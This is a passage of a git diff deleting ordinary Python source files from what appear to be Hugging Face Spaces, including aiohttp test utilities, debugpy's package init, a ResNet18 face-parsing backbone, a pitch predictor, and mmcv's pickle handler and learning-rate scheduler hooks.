Optional[Type[BaseException]], - exc_value: Optional[BaseException], - traceback: Optional[TracebackType], - ) -> None: - # __exit__ should exist in pair with __enter__ but never executed - pass # pragma: no cover - - async def __aenter__(self) -> "BaseTestServer": - await self.start_server(loop=self._loop) - return self - - async def __aexit__( - self, - exc_type: Optional[Type[BaseException]], - exc_value: Optional[BaseException], - traceback: Optional[TracebackType], - ) -> None: - await self.close() - - -class TestServer(BaseTestServer): - def __init__( - self, - app: Application, - *, - scheme: Union[str, object] = sentinel, - host: str = "127.0.0.1", - port: Optional[int] = None, - **kwargs: Any, - ): - self.app = app - super().__init__(scheme=scheme, host=host, port=port, **kwargs) - - async def _make_runner(self, **kwargs: Any) -> BaseRunner: - return AppRunner(self.app, **kwargs) - - -class RawTestServer(BaseTestServer): - def __init__( - self, - handler: _RequestHandler, - *, - scheme: Union[str, object] = sentinel, - host: str = "127.0.0.1", - port: Optional[int] = None, - **kwargs: Any, - ) -> None: - self._handler = handler - super().__init__(scheme=scheme, host=host, port=port, **kwargs) - - async def _make_runner(self, debug: bool = True, **kwargs: Any) -> ServerRunner: - srv = Server(self._handler, loop=self._loop, debug=debug, **kwargs) - return ServerRunner(srv, debug=debug, **kwargs) - - -class TestClient: - """ - A test client implementation. - - To write functional tests for aiohttp based servers. - - """ - - __test__ = False - - def __init__( - self, - server: BaseTestServer, - *, - cookie_jar: Optional[AbstractCookieJar] = None, - loop: Optional[asyncio.AbstractEventLoop] = None, - **kwargs: Any, - ) -> None: - if not isinstance(server, BaseTestServer): - raise TypeError( - "server must be TestServer " "instance, found type: %r" % type(server) - ) - self._server = server - self._loop = loop - if cookie_jar is None: - cookie_jar = aiohttp.CookieJar(unsafe=True, loop=loop) - self._session = ClientSession(loop=loop, cookie_jar=cookie_jar, **kwargs) - self._closed = False - self._responses: List[ClientResponse] = [] - self._websockets: List[ClientWebSocketResponse] = [] - - async def start_server(self) -> None: - await self._server.start_server(loop=self._loop) - - @property - def host(self) -> str: - return self._server.host - - @property - def port(self) -> Optional[int]: - return self._server.port - - @property - def server(self) -> BaseTestServer: - return self._server - - @property - def app(self) -> Optional[Application]: - return cast(Optional[Application], getattr(self._server, "app", None)) - - @property - def session(self) -> ClientSession: - """An internal aiohttp.ClientSession. - - Unlike the methods on the TestClient, client session requests - do not automatically include the host in the url queried, and - will require an absolute path to the resource. - - """ - return self._session - - def make_url(self, path: str) -> URL: - return self._server.make_url(path) - - async def _request(self, method: str, path: str, **kwargs: Any) -> ClientResponse: - resp = await self._session.request(method, self.make_url(path), **kwargs) - # save it to close later - self._responses.append(resp) - return resp - - def request(self, method: str, path: str, **kwargs: Any) -> _RequestContextManager: - """Routes a request to tested http server. - - The interface is identical to aiohttp.ClientSession.request, - except the loop kwarg is overridden by the instance used by the - test server. - - """ - return _RequestContextManager(self._request(method, path, **kwargs)) - - def get(self, path: str, **kwargs: Any) -> _RequestContextManager: - """Perform an HTTP GET request.""" - return _RequestContextManager(self._request(hdrs.METH_GET, path, **kwargs)) - - def post(self, path: str, **kwargs: Any) -> _RequestContextManager: - """Perform an HTTP POST request.""" - return _RequestContextManager(self._request(hdrs.METH_POST, path, **kwargs)) - - def options(self, path: str, **kwargs: Any) -> _RequestContextManager: - """Perform an HTTP OPTIONS request.""" - return _RequestContextManager(self._request(hdrs.METH_OPTIONS, path, **kwargs)) - - def head(self, path: str, **kwargs: Any) -> _RequestContextManager: - """Perform an HTTP HEAD request.""" - return _RequestContextManager(self._request(hdrs.METH_HEAD, path, **kwargs)) - - def put(self, path: str, **kwargs: Any) -> _RequestContextManager: - """Perform an HTTP PUT request.""" - return _RequestContextManager(self._request(hdrs.METH_PUT, path, **kwargs)) - - def patch(self, path: str, **kwargs: Any) -> _RequestContextManager: - """Perform an HTTP PATCH request.""" - return _RequestContextManager(self._request(hdrs.METH_PATCH, path, **kwargs)) - - def delete(self, path: str, **kwargs: Any) -> _RequestContextManager: - """Perform an HTTP PATCH request.""" - return _RequestContextManager(self._request(hdrs.METH_DELETE, path, **kwargs)) - - def ws_connect(self, path: str, **kwargs: Any) -> _WSRequestContextManager: - """Initiate websocket connection. - - The api corresponds to aiohttp.ClientSession.ws_connect. - - """ - return _WSRequestContextManager(self._ws_connect(path, **kwargs)) - - async def _ws_connect(self, path: str, **kwargs: Any) -> ClientWebSocketResponse: - ws = await self._session.ws_connect(self.make_url(path), **kwargs) - self._websockets.append(ws) - return ws - - async def close(self) -> None: - """Close all fixtures created by the test client. - - After that point, the TestClient is no longer usable. - - This is an idempotent function: running close multiple times - will not have any additional effects. - - close is also run on exit when used as a(n) (asynchronous) - context manager. - - """ - if not self._closed: - for resp in self._responses: - resp.close() - for ws in self._websockets: - await ws.close() - await self._session.close() - await self._server.close() - self._closed = True - - def __enter__(self) -> None: - raise TypeError("Use async with instead") - - def __exit__( - self, - exc_type: Optional[Type[BaseException]], - exc: Optional[BaseException], - tb: Optional[TracebackType], - ) -> None: - # __exit__ should exist in pair with __enter__ but never executed - pass # pragma: no cover - - async def __aenter__(self) -> "TestClient": - await self.start_server() - return self - - async def __aexit__( - self, - exc_type: Optional[Type[BaseException]], - exc: Optional[BaseException], - tb: Optional[TracebackType], - ) -> None: - await self.close() - - -class AioHTTPTestCase(TestCase): - """A base class to allow for unittest web applications using aiohttp. - - Provides the following: - - * self.client (aiohttp.test_utils.TestClient): an aiohttp test client. - * self.loop (asyncio.BaseEventLoop): the event loop in which the - application and server are running. - * self.app (aiohttp.web.Application): the application returned by - self.get_application() - - Note that the TestClient's methods are asynchronous: you have to - execute function on the test client using asynchronous methods. - """ - - async def get_application(self) -> Application: - """Get application. - - This method should be overridden - to return the aiohttp.web.Application - object to test. - """ - return self.get_app() - - def get_app(self) -> Application: - """Obsolete method used to constructing web application. - - Use .get_application() coroutine instead. - """ - raise RuntimeError("Did you forget to define get_application()?") - - def setUp(self) -> None: - if not PY_38: - asyncio.get_event_loop().run_until_complete(self.asyncSetUp()) - - async def asyncSetUp(self) -> None: - try: - self.loop = asyncio.get_running_loop() - except (AttributeError, RuntimeError): # AttributeError->py36 - self.loop = asyncio.get_event_loop_policy().get_event_loop() - - return await self.setUpAsync() - - async def setUpAsync(self) -> None: - self.app = await self.get_application() - self.server = await self.get_server(self.app) - self.client = await self.get_client(self.server) - - await self.client.start_server() - - def tearDown(self) -> None: - if not PY_38: - self.loop.run_until_complete(self.asyncTearDown()) - - async def asyncTearDown(self) -> None: - return await self.tearDownAsync() - - async def tearDownAsync(self) -> None: - await self.client.close() - - async def get_server(self, app: Application) -> TestServer: - """Return a TestServer instance.""" - return TestServer(app, loop=self.loop) - - async def get_client(self, server: TestServer) -> TestClient: - """Return a TestClient instance.""" - return TestClient(server, loop=self.loop) - - -def unittest_run_loop(func: Any, *args: Any, **kwargs: Any) -> Any: - """ - A decorator dedicated to use with asynchronous AioHTTPTestCase test methods. - - In 3.8+, this does nothing. - """ - warnings.warn( - "Decorator `@unittest_run_loop` is no longer needed in aiohttp 3.8+", - DeprecationWarning, - stacklevel=2, - ) - return func - - -_LOOP_FACTORY = Callable[[], asyncio.AbstractEventLoop] - - -@contextlib.contextmanager -def loop_context( - loop_factory: _LOOP_FACTORY = asyncio.new_event_loop, fast: bool = False -) -> Iterator[asyncio.AbstractEventLoop]: - """A contextmanager that creates an event_loop, for test purposes. - - Handles the creation and cleanup of a test loop. - """ - loop = setup_test_loop(loop_factory) - yield loop - teardown_test_loop(loop, fast=fast) - - -def setup_test_loop( - loop_factory: _LOOP_FACTORY = asyncio.new_event_loop, -) -> asyncio.AbstractEventLoop: - """Create and return an asyncio.BaseEventLoop instance. - - The caller should also call teardown_test_loop, - once they are done with the loop. - """ - loop = loop_factory() - try: - module = loop.__class__.__module__ - skip_watcher = "uvloop" in module - except AttributeError: # pragma: no cover - # Just in case - skip_watcher = True - asyncio.set_event_loop(loop) - if sys.platform != "win32" and not skip_watcher: - policy = asyncio.get_event_loop_policy() - watcher: asyncio.AbstractChildWatcher - try: # Python >= 3.8 - # Refs: - # * https://github.com/pytest-dev/pytest-xdist/issues/620 - # * https://stackoverflow.com/a/58614689/595220 - # * https://bugs.python.org/issue35621 - # * https://github.com/python/cpython/pull/14344 - watcher = asyncio.ThreadedChildWatcher() - except AttributeError: # Python < 3.8 - watcher = asyncio.SafeChildWatcher() - watcher.attach_loop(loop) - with contextlib.suppress(NotImplementedError): - policy.set_child_watcher(watcher) - return loop - - -def teardown_test_loop(loop: asyncio.AbstractEventLoop, fast: bool = False) -> None: - """Teardown and cleanup an event_loop created by setup_test_loop.""" - closed = loop.is_closed() - if not closed: - loop.call_soon(loop.stop) - loop.run_forever() - loop.close() - - if not fast: - gc.collect() - - asyncio.set_event_loop(None) - - -def _create_app_mock() -> mock.MagicMock: - def get_dict(app: Any, key: str) -> Any: - return app.__app_dict[key] - - def set_dict(app: Any, key: str, value: Any) -> None: - app.__app_dict[key] = value - - app = mock.MagicMock(spec=Application) - app.__app_dict = {} - app.__getitem__ = get_dict - app.__setitem__ = set_dict - - app._debug = False - app.on_response_prepare = Signal(app) - app.on_response_prepare.freeze() - return app - - -def _create_transport(sslcontext: Optional[SSLContext] = None) -> mock.Mock: - transport = mock.Mock() - - def get_extra_info(key: str) -> Optional[SSLContext]: - if key == "sslcontext": - return sslcontext - else: - return None - - transport.get_extra_info.side_effect = get_extra_info - return transport - - -def make_mocked_request( - method: str, - path: str, - headers: Any = None, - *, - match_info: Any = sentinel, - version: HttpVersion = HttpVersion(1, 1), - closing: bool = False, - app: Any = None, - writer: Any = sentinel, - protocol: Any = sentinel, - transport: Any = sentinel, - payload: Any = sentinel, - sslcontext: Optional[SSLContext] = None, - client_max_size: int = 1024**2, - loop: Any = ..., -) -> Request: - """Creates mocked web.Request testing purposes. - - Useful in unit tests, when spinning full web server is overkill or - specific conditions and errors are hard to trigger. - """ - task = mock.Mock() - if loop is ...: - loop = mock.Mock() - loop.create_future.return_value = () - - if version < HttpVersion(1, 1): - closing = True - - if headers: - headers = CIMultiDictProxy(CIMultiDict(headers)) - raw_hdrs = tuple( - (k.encode("utf-8"), v.encode("utf-8")) for k, v in headers.items() - ) - else: - headers = CIMultiDictProxy(CIMultiDict()) - raw_hdrs = () - - chunked = "chunked" in headers.get(hdrs.TRANSFER_ENCODING, "").lower() - - message = RawRequestMessage( - method, - path, - version, - headers, - raw_hdrs, - closing, - None, - False, - chunked, - URL(path), - ) - if app is None: - app = _create_app_mock() - - if transport is sentinel: - transport = _create_transport(sslcontext) - - if protocol is sentinel: - protocol = mock.Mock() - protocol.transport = transport - - if writer is sentinel: - writer = mock.Mock() - writer.write_headers = make_mocked_coro(None) - writer.write = make_mocked_coro(None) - writer.write_eof = make_mocked_coro(None) - writer.drain = make_mocked_coro(None) - writer.transport = transport - - protocol.transport = transport - protocol.writer = writer - - if payload is sentinel: - payload = mock.Mock() - - req = Request( - message, payload, protocol, writer, task, loop, client_max_size=client_max_size - ) - - match_info = UrlMappingMatchInfo( - {} if match_info is sentinel else match_info, mock.Mock() - ) - match_info.add_app(app) - req._match_info = match_info - - return req - - -def make_mocked_coro( - return_value: Any = sentinel, raise_exception: Any = sentinel -) -> Any: - """Creates a coroutine mock.""" - - async def mock_coro(*args: Any, **kwargs: Any) -> Any: - if raise_exception is not sentinel: - raise raise_exception - if not inspect.isawaitable(return_value): - return return_value - await return_value - - return mock.Mock(wraps=mock_coro) diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/debugpy/__init__.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/debugpy/__init__.py deleted file mode 100644 index 975bec79b9f6bb55393b0931ca3a3dc50cc4ae54..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/debugpy/__init__.py +++ /dev/null @@ -1,38 +0,0 @@ -# Copyright (c) Microsoft Corporation. All rights reserved. -# Licensed under the MIT License. See LICENSE in the project root -# for license information. - -"""An implementation of the Debug Adapter Protocol (DAP) for Python. - -https://microsoft.github.io/debug-adapter-protocol/ -""" - -# debugpy stable public API consists solely of members of this module that are -# enumerated below. -__all__ = [ # noqa - "__version__", - "breakpoint", - "configure", - "connect", - "debug_this_thread", - "is_client_connected", - "listen", - "log_to", - "trace_this_thread", - "wait_for_client", -] - -import sys - -assert sys.version_info >= (3, 7), ( - "Python 3.6 and below is not supported by this version of debugpy; " - "use debugpy 1.5.1 or earlier." -) - - -# Actual definitions are in a separate file to work around parsing issues causing -# SyntaxError on Python 2 and preventing the above version check from executing. -from debugpy.public_api import * # noqa -from debugpy.public_api import __version__ - -del sys diff --git a/spaces/Suniilkumaar/SwapMukham/face_parsing/resnet.py b/spaces/Suniilkumaar/SwapMukham/face_parsing/resnet.py deleted file mode 100644 index aa2bf95130e9815ba378cb6f73207068b81a04b9..0000000000000000000000000000000000000000 --- a/spaces/Suniilkumaar/SwapMukham/face_parsing/resnet.py +++ /dev/null @@ -1,109 +0,0 @@ -#!/usr/bin/python -# -*- encoding: utf-8 -*- - -import torch -import torch.nn as nn -import torch.nn.functional as F -import torch.utils.model_zoo as modelzoo - -# from modules.bn import InPlaceABNSync as BatchNorm2d - -resnet18_url = 'https://download.pytorch.org/models/resnet18-5c106cde.pth' - - -def conv3x3(in_planes, out_planes, stride=1): - """3x3 convolution with padding""" - return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, - padding=1, bias=False) - - -class BasicBlock(nn.Module): - def __init__(self, in_chan, out_chan, stride=1): - super(BasicBlock, self).__init__() - self.conv1 = conv3x3(in_chan, out_chan, stride) - self.bn1 = nn.BatchNorm2d(out_chan) - self.conv2 = conv3x3(out_chan, out_chan) - self.bn2 = nn.BatchNorm2d(out_chan) - self.relu = nn.ReLU(inplace=True) - self.downsample = None - if in_chan != out_chan or stride != 1: - self.downsample = nn.Sequential( - nn.Conv2d(in_chan, out_chan, - kernel_size=1, stride=stride, bias=False), - nn.BatchNorm2d(out_chan), - ) - - def forward(self, x): - residual = self.conv1(x) - residual = F.relu(self.bn1(residual)) - residual = self.conv2(residual) - residual = self.bn2(residual) - - shortcut = x - if self.downsample is not None: - shortcut = self.downsample(x) - - out = shortcut + residual - out = self.relu(out) - return out - - -def create_layer_basic(in_chan, out_chan, bnum, stride=1): - layers = [BasicBlock(in_chan, out_chan, stride=stride)] - for i in range(bnum-1): - layers.append(BasicBlock(out_chan, out_chan, stride=1)) - return nn.Sequential(*layers) - - -class Resnet18(nn.Module): - def __init__(self): - super(Resnet18, self).__init__() - self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, - bias=False) - self.bn1 = nn.BatchNorm2d(64) - self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1) - self.layer1 = create_layer_basic(64, 64, bnum=2, stride=1) - self.layer2 = create_layer_basic(64, 128, bnum=2, stride=2) - self.layer3 = create_layer_basic(128, 256, bnum=2, stride=2) - self.layer4 = create_layer_basic(256, 512, bnum=2, stride=2) - self.init_weight() - - def forward(self, x): - x = self.conv1(x) - x = F.relu(self.bn1(x)) - x = self.maxpool(x) - - x = self.layer1(x) - feat8 = self.layer2(x) # 1/8 - feat16 = self.layer3(feat8) # 1/16 - feat32 = self.layer4(feat16) # 1/32 - return feat8, feat16, feat32 - - def init_weight(self): - state_dict = modelzoo.load_url(resnet18_url) - self_state_dict = self.state_dict() - for k, v in state_dict.items(): - if 'fc' in k: continue - self_state_dict.update({k: v}) - self.load_state_dict(self_state_dict) - - def get_params(self): - wd_params, nowd_params = [], [] - for name, module in self.named_modules(): - if isinstance(module, (nn.Linear, nn.Conv2d)): - wd_params.append(module.weight) - if not module.bias is None: - nowd_params.append(module.bias) - elif isinstance(module, nn.BatchNorm2d): - nowd_params += list(module.parameters()) - return wd_params, nowd_params - - -if __name__ == "__main__": - net = Resnet18() - x = torch.randn(16, 3, 224, 224) - out = net(x) - print(out[0].size()) - print(out[1].size()) - print(out[2].size()) - net.get_params() diff --git a/spaces/Supedsa/rvc-models/lib/infer_pack/modules/F0Predictor/PMF0Predictor.py b/spaces/Supedsa/rvc-models/lib/infer_pack/modules/F0Predictor/PMF0Predictor.py deleted file mode 100644 index b2c592527a5966e6f8e79e8c52dc5b414246dcc6..0000000000000000000000000000000000000000 --- a/spaces/Supedsa/rvc-models/lib/infer_pack/modules/F0Predictor/PMF0Predictor.py +++ /dev/null @@ -1,97 +0,0 @@ -from lib.infer_pack.modules.F0Predictor.F0Predictor import F0Predictor -import parselmouth -import numpy as np - - -class PMF0Predictor(F0Predictor): - def __init__(self, hop_length=512, f0_min=50, f0_max=1100, sampling_rate=44100): - self.hop_length = hop_length - self.f0_min = f0_min - self.f0_max = f0_max - self.sampling_rate = sampling_rate - - def interpolate_f0(self, f0): - """ - 对F0进行插值处理 - """ - - data = np.reshape(f0, (f0.size, 1)) - - vuv_vector = np.zeros((data.size, 1), dtype=np.float32) - vuv_vector[data > 0.0] = 1.0 - vuv_vector[data <= 0.0] = 0.0 - - ip_data = data - - frame_number = data.size - last_value = 0.0 - for i in range(frame_number): - if data[i] <= 0.0: - j = i + 1 - for j in range(i + 1, frame_number): - if data[j] > 0.0: - break - if j < frame_number - 1: - if last_value > 0.0: - step = (data[j] - data[i - 1]) / float(j - i) - for k in range(i, j): - ip_data[k] = data[i - 1] + step * (k - i + 1) - else: - for k in range(i, j): - ip_data[k] = data[j] - else: - for k in range(i, frame_number): - ip_data[k] = last_value - else: - ip_data[i] = data[i] # 这里可能存在一个没有必要的拷贝 - last_value = data[i] - - return ip_data[:, 0], vuv_vector[:, 0] - - def compute_f0(self, wav, p_len=None): - x = wav - if p_len is None: - p_len = x.shape[0] // self.hop_length - else: - assert abs(p_len - x.shape[0] // self.hop_length) < 4, "pad length error" - time_step = self.hop_length / self.sampling_rate * 1000 - f0 = ( - parselmouth.Sound(x, self.sampling_rate) - .to_pitch_ac( - time_step=time_step / 1000, - voicing_threshold=0.6, - pitch_floor=self.f0_min, - pitch_ceiling=self.f0_max, - ) - .selected_array["frequency"] - ) - - pad_size = (p_len - len(f0) + 1) // 2 - if pad_size > 0 or p_len - len(f0) - pad_size > 0: - f0 = np.pad(f0, [[pad_size, p_len - len(f0) - pad_size]], mode="constant") - f0, uv = self.interpolate_f0(f0) - return f0 - - def compute_f0_uv(self, wav, p_len=None): - x = wav - if p_len is None: - p_len = x.shape[0] // self.hop_length - else: - assert abs(p_len - x.shape[0] // self.hop_length) < 4, "pad length error" - time_step = self.hop_length / self.sampling_rate * 1000 - f0 = ( - parselmouth.Sound(x, self.sampling_rate) - .to_pitch_ac( - time_step=time_step / 1000, - voicing_threshold=0.6, - pitch_floor=self.f0_min, - pitch_ceiling=self.f0_max, - ) - .selected_array["frequency"] - ) - - pad_size = (p_len - len(f0) + 1) // 2 - if pad_size > 0 or p_len - len(f0) - pad_size > 0: - f0 = np.pad(f0, [[pad_size, p_len - len(f0) - pad_size]], mode="constant") - f0, uv = self.interpolate_f0(f0) - return f0, uv diff --git a/spaces/Superlang/ImageProcessor/annotator/uniformer/mmcv/fileio/handlers/pickle_handler.py b/spaces/Superlang/ImageProcessor/annotator/uniformer/mmcv/fileio/handlers/pickle_handler.py deleted file mode 100644 index b37c79bed4ef9fd8913715e62dbe3fc5cafdc3aa..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/uniformer/mmcv/fileio/handlers/pickle_handler.py +++ /dev/null @@ -1,28 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import pickle - -from .base import BaseFileHandler - - -class PickleHandler(BaseFileHandler): - - str_like = False - - def load_from_fileobj(self, file, **kwargs): - return pickle.load(file, **kwargs) - - def load_from_path(self, filepath, **kwargs): - return super(PickleHandler, self).load_from_path( - filepath, mode='rb', **kwargs) - - def dump_to_str(self, obj, **kwargs): - kwargs.setdefault('protocol', 2) - return pickle.dumps(obj, **kwargs) - - def dump_to_fileobj(self, obj, file, **kwargs): - kwargs.setdefault('protocol', 2) - pickle.dump(obj, file, **kwargs) - - def dump_to_path(self, obj, filepath, **kwargs): - super(PickleHandler, self).dump_to_path( - obj, filepath, mode='wb', **kwargs) diff --git a/spaces/Superlang/ImageProcessor/annotator/uniformer/mmcv/runner/hooks/lr_updater.py b/spaces/Superlang/ImageProcessor/annotator/uniformer/mmcv/runner/hooks/lr_updater.py deleted file mode 100644 index 6365908ddf6070086de2ffc0afada46ed2f32256..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/uniformer/mmcv/runner/hooks/lr_updater.py +++ /dev/null @@ -1,670 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import numbers -from math import cos, pi - -import annotator.uniformer.mmcv as mmcv -from .hook import HOOKS, Hook - - -class LrUpdaterHook(Hook): - """LR Scheduler in MMCV. - - Args: - by_epoch (bool): LR changes epoch by epoch - warmup (string): Type of warmup used. It can be None(use no warmup), - 'constant', 'linear' or 'exp' - warmup_iters (int): The number of iterations or epochs that warmup - lasts - warmup_ratio (float): LR used at the beginning of warmup equals to - warmup_ratio * initial_lr - warmup_by_epoch (bool): When warmup_by_epoch == True, warmup_iters - means the number of epochs that warmup lasts, otherwise means the - number of iteration that warmup lasts - """ - - def __init__(self, - by_epoch=True, - warmup=None, - warmup_iters=0, - warmup_ratio=0.1, - warmup_by_epoch=False): - # validate the "warmup" argument - if warmup is not None: - if warmup not in ['constant', 'linear', 'exp']: - raise ValueError( - f'"{warmup}" is not a supported type for warming up, valid' - ' types are "constant" and "linear"') - if warmup is not None: - assert warmup_iters > 0, \ - '"warmup_iters" must be a positive integer' - assert 0 < warmup_ratio <= 1.0, \ - '"warmup_ratio" must be in range (0,1]' - - self.by_epoch = by_epoch - self.warmup = warmup - self.warmup_iters = warmup_iters - self.warmup_ratio = warmup_ratio - self.warmup_by_epoch = warmup_by_epoch - - if self.warmup_by_epoch: - self.warmup_epochs = self.warmup_iters - self.warmup_iters = None - else: - self.warmup_epochs = None - - self.base_lr = [] # initial lr for all param groups - self.regular_lr = [] # expected lr if no warming up is performed - - def _set_lr(self, runner, lr_groups): - if isinstance(runner.optimizer, dict): - for k, optim in runner.optimizer.items(): - for param_group, lr in zip(optim.param_groups, lr_groups[k]): - param_group['lr'] = lr - else: - for param_group, lr in zip(runner.optimizer.param_groups, - lr_groups): - param_group['lr'] = lr - - def get_lr(self, runner, base_lr): - raise NotImplementedError - - def get_regular_lr(self, runner): - if isinstance(runner.optimizer, dict): - lr_groups = {} - for k in runner.optimizer.keys(): - _lr_group = [ - self.get_lr(runner, _base_lr) - for _base_lr in self.base_lr[k] - ] - lr_groups.update({k: _lr_group}) - - return lr_groups - else: - return [self.get_lr(runner, _base_lr) for _base_lr in self.base_lr] - - def get_warmup_lr(self, cur_iters): - - def _get_warmup_lr(cur_iters, regular_lr): - if self.warmup == 'constant': - warmup_lr = [_lr * self.warmup_ratio for _lr in regular_lr] - elif self.warmup == 'linear': - k = (1 - cur_iters / self.warmup_iters) * (1 - - self.warmup_ratio) - warmup_lr = [_lr * (1 - k) for _lr in regular_lr] - elif self.warmup == 'exp': - k = self.warmup_ratio**(1 - cur_iters / self.warmup_iters) - warmup_lr = [_lr * k for _lr in regular_lr] - return warmup_lr - - if isinstance(self.regular_lr, dict): - lr_groups = {} - for key, regular_lr in self.regular_lr.items(): - lr_groups[key] = _get_warmup_lr(cur_iters, regular_lr) - return lr_groups - else: - return _get_warmup_lr(cur_iters, self.regular_lr) - - def before_run(self, runner): - # NOTE: when resuming from a checkpoint, if 'initial_lr' is not saved, - # it will be set according to the optimizer params - if isinstance(runner.optimizer, dict): - self.base_lr = {} - for k, optim in runner.optimizer.items(): - for group in optim.param_groups: - group.setdefault('initial_lr', group['lr']) - _base_lr = [ - group['initial_lr'] for group in optim.param_groups - ] - self.base_lr.update({k: _base_lr}) - else: - for group in runner.optimizer.param_groups: - group.setdefault('initial_lr', group['lr']) - self.base_lr = [ - group['initial_lr'] for group in runner.optimizer.param_groups - ] - - def before_train_epoch(self, runner): - if self.warmup_iters is None: - epoch_len = len(runner.data_loader) - self.warmup_iters = self.warmup_epochs * epoch_len - - if not self.by_epoch: - return - - self.regular_lr = self.get_regular_lr(runner) - self._set_lr(runner, self.regular_lr) - - def before_train_iter(self, runner): - cur_iter = runner.iter - if not self.by_epoch: - self.regular_lr = self.get_regular_lr(runner) - if self.warmup is None or cur_iter >= self.warmup_iters: - self._set_lr(runner, self.regular_lr) - else: - warmup_lr = self.get_warmup_lr(cur_iter) - self._set_lr(runner, warmup_lr) - elif self.by_epoch: - if self.warmup is None or cur_iter > self.warmup_iters: - return - elif cur_iter == self.warmup_iters: - self._set_lr(runner, self.regular_lr) - else: - warmup_lr = self.get_warmup_lr(cur_iter) - self._set_lr(runner, warmup_lr) - - -@HOOKS.register_module() -class FixedLrUpdaterHook(LrUpdaterHook): - - def __init__(self, **kwargs): - super(FixedLrUpdaterHook, self).__init__(**kwargs) - - def get_lr(self, runner, base_lr): - return base_lr - - -@HOOKS.register_module() -class StepLrUpdaterHook(LrUpdaterHook): - """Step LR scheduler with min_lr clipping. - - Args: - step (int | list[int]): Step to decay the LR. If an int value is given, - regard it as the decay interval. If a list is given, decay LR at - these steps. - gamma (float, optional): Decay LR ratio. Default: 0.1. - min_lr (float, optional): Minimum LR value to keep. If LR after decay - is lower than `min_lr`, it will be clipped to this value. If None - is given, we don't perform lr clipping. Default: None. - """ - - def __init__(self, step, gamma=0.1, min_lr=None, **kwargs): - if isinstance(step, list): - assert mmcv.is_list_of(step, int) - assert all([s > 0 for s in step]) - elif isinstance(step, int): - assert step > 0 - else: - raise TypeError('"step" must be a list or integer') - self.step = step - self.gamma = gamma - self.min_lr = min_lr - super(StepLrUpdaterHook, self).__init__(**kwargs) - - def get_lr(self, runner, base_lr): - progress = runner.epoch if self.by_epoch else runner.iter - - # calculate exponential term - if isinstance(self.step, int): - exp = progress // self.step - else: - exp = len(self.step) - for i, s in enumerate(self.step): - if progress < s: - exp = i - break - - lr = base_lr * (self.gamma**exp) - if self.min_lr is not None: - # clip to a minimum value - lr = max(lr, self.min_lr) - return lr - - -@HOOKS.register_module() -class ExpLrUpdaterHook(LrUpdaterHook): - - def __init__(self, gamma, **kwargs): - self.gamma = gamma - super(ExpLrUpdaterHook, self).__init__(**kwargs) - - def get_lr(self, runner, base_lr): - progress = runner.epoch if self.by_epoch else runner.iter - return base_lr * self.gamma**progress - - -@HOOKS.register_module() -class PolyLrUpdaterHook(LrUpdaterHook): - - def __init__(self, power=1., min_lr=0., **kwargs): - self.power = power - self.min_lr = min_lr - super(PolyLrUpdaterHook, self).__init__(**kwargs) - - def get_lr(self, runner, base_lr): - if self.by_epoch: - progress = runner.epoch - max_progress = runner.max_epochs - else: - progress = runner.iter - max_progress = runner.max_iters - coeff = (1 - progress / max_progress)**self.power - return (base_lr - self.min_lr) * coeff + self.min_lr - - -@HOOKS.register_module() -class InvLrUpdaterHook(LrUpdaterHook): - - def __init__(self, gamma, power=1., **kwargs): - self.gamma = gamma - self.power = power - super(InvLrUpdaterHook, self).__init__(**kwargs) - - def get_lr(self, runner, base_lr): - progress = runner.epoch if self.by_epoch else runner.iter - return base_lr * (1 + self.gamma * progress)**(-self.power) - - -@HOOKS.register_module() -class CosineAnnealingLrUpdaterHook(LrUpdaterHook): - - def __init__(self, min_lr=None, min_lr_ratio=None, **kwargs): - assert (min_lr is None) ^ (min_lr_ratio is None) - self.min_lr = min_lr - self.min_lr_ratio = min_lr_ratio - super(CosineAnnealingLrUpdaterHook, self).__init__(**kwargs) - - def get_lr(self, runner, base_lr): - if self.by_epoch: - progress = runner.epoch - max_progress = runner.max_epochs - else: - progress = runner.iter - max_progress = runner.max_iters - - if self.min_lr_ratio is not None: - target_lr = base_lr * self.min_lr_ratio - else: - target_lr = self.min_lr - return annealing_cos(base_lr, target_lr, progress / max_progress) - - -@HOOKS.register_module() -class FlatCosineAnnealingLrUpdaterHook(LrUpdaterHook): - """Flat + Cosine lr schedule. - - Modified from https://github.com/fastai/fastai/blob/master/fastai/callback/schedule.py#L128 # noqa: E501 - - Args: - start_percent (float): When to start annealing the learning rate - after the percentage of the total training steps. - The value should be in range [0, 1). - Default: 0.75 - min_lr (float, optional): The minimum lr. Default: None. - min_lr_ratio (float, optional): The ratio of minimum lr to the base lr. - Either `min_lr` or `min_lr_ratio` should be specified. - Default: None. - """ - - def __init__(self, - start_percent=0.75, - min_lr=None, - min_lr_ratio=None, - **kwargs): - assert (min_lr is None) ^ (min_lr_ratio is None) - if start_percent < 0 or start_percent > 1 or not isinstance( - start_percent, float): - raise ValueError( - 'expected float between 0 and 1 start_percent, but ' - f'got {start_percent}') - self.start_percent = start_percent - self.min_lr = min_lr - self.min_lr_ratio = min_lr_ratio - super(FlatCosineAnnealingLrUpdaterHook, self).__init__(**kwargs) - - def get_lr(self, runner, base_lr): - if self.by_epoch: - start = round(runner.max_epochs * self.start_percent) - progress = runner.epoch - start - max_progress = runner.max_epochs - start - else: - start = round(runner.max_iters * self.start_percent) - progress = runner.iter - start - max_progress = runner.max_iters - start - - if self.min_lr_ratio is not None: - target_lr = base_lr * self.min_lr_ratio - else: - target_lr = self.min_lr - - if progress < 0: - return base_lr - else: - return annealing_cos(base_lr, target_lr, progress / max_progress) - - -@HOOKS.register_module() -class CosineRestartLrUpdaterHook(LrUpdaterHook): - """Cosine annealing with restarts learning rate scheme. - - Args: - periods (list[int]): Periods for each cosine anneling cycle. - restart_weights (list[float], optional): Restart weights at each - restart iteration. Default: [1]. - min_lr (float, optional): The minimum lr. Default: None. - min_lr_ratio (float, optional): The ratio of minimum lr to the base lr. - Either `min_lr` or `min_lr_ratio` should be specified. - Default: None. - """ - - def __init__(self, - periods, - restart_weights=[1], - min_lr=None, - 